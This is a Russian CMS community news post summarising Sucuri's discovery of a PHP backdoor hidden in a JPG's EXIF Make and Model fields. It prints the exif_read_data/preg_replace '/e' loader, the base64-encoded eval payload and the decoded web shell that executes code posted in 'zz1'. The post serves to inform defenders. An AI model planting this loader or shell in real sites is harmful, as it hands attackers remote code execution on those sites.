Язык
Контакты
GitHub
Поддержка
Регистрация
Войти
Логин: Пароль: Запомнить:
Пользователи
Голосование

    Какую CMS Вы предпочитаете

    AtomX
    Fapos CMS
    Drunya CMS
Последние комментарии
Автор: чайник, в новости:

Что такое API и для чего они нужны

Автор: HIshnik, в новости:

Классы в PHP для чайников

Автор: Аноним, в новости:

Написание простого вируса в блокноте

Автор: stream, в новости:

Создаем BB коды на PHP

Топ пользователей
Drunya
Репутация: 108
Сообщений: 3527
Сашка_из_Шебекино
Репутация: 87
Сообщений: 1803
boriska
Репутация: 65
Сообщений: 846
ARMI
Репутация: 46
Сообщений: 1858
BAH0
Репутация: 26
Сообщений: 544
Компания Sucuri обнаружила новый способ внедрения бэкдора на веб-сайт: код прячется в служебном поле EXIF изображения JPG. Это может
быть или новое изображение, которое пользователям разрешено добавлять на
сайт, например, в качестве своего аватара или другой фотографии на
форуме. Или это может быть измененная версия оригинального изображения.

На взломанном сайте был обнаружен на первый взгляд нормальный PHP-код, содержащий две функции PHP. Первая функция служит для
считывания служебных данных EXIF из файла JPG, а вторая функция
запускает программу.

Code:
$exif = exif_read_data('/homepages/clientsitepath/images/stories/food/bun.jpg');preg_replace($exif['Make'],$exif['Model'],'');
Как и следовало предполагать, вторую часть бэкдора нашли в файле bun.jpg.
Code:
ÿØÿà^@^PJFIF^@^A^B^@^@d^@d^@^@ÿá^@¡Exif^@^@II*^@^H^@^@^@^B^@^O^A^B^@^F^@^@^@&^@^@^@^P^A^B^@m^@^@^@,^@^@^@^@^@^@^@/.*/e^
@ eval ( base64_decode("aWYgKGl zc2V0KCRfUE9TVFsie noxIl0pKSB7ZXZhbChzd
HJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30='));
@ÿì^@^QDucky^@^A^@^D^@^@^@<^@^@ÿî^@^NAdobe^
Заголовок Make содержит параметр "/.*/e". В PHP-функции preg_replace параметр /e используется для исполнения передаваемого ему кода. В то же
время заголовок Model содержит непосредственно сам код.

Если расшифровать текст, закодированный в base64, то мы увидим следующее.
Code:
if (isset($_POST["zz1"])) {eval(stripslashes($_POST["zz1"]));}
То есть бэкдор готов запустить на исполнение любой контент, полученный в POST-запросе через переменную zzl.

По мнению исследователей, это довольно необычный способ прятать исполняемый код на сайте. Эдакий взлом с элементами стеганографии.
Код бэкдора спрятан в JPG EXIF

Теги: код; бэкдора; это; или; может быть;
Автор: Сашка_из_Шебекино
Категория: Разное
Просмотров: 2050
Комментариев: 2

Комментарии
  • User avatar

    Сашка_из_Шебекино

    Так у нас exif_read_data() нигде не используется, нам не грозит
    Дата отправления: 21 Июл 2013
  • User avatar

    boriska

    тэээкс ща взломаем что-нибудь хы :) А вообще надо бы защиту на фапос придумать а?
    Дата отправления: 20 Июл 2013
Категории:
Сейчас online: 29. Зарегистрированных: 1. Гостей: 28.
-->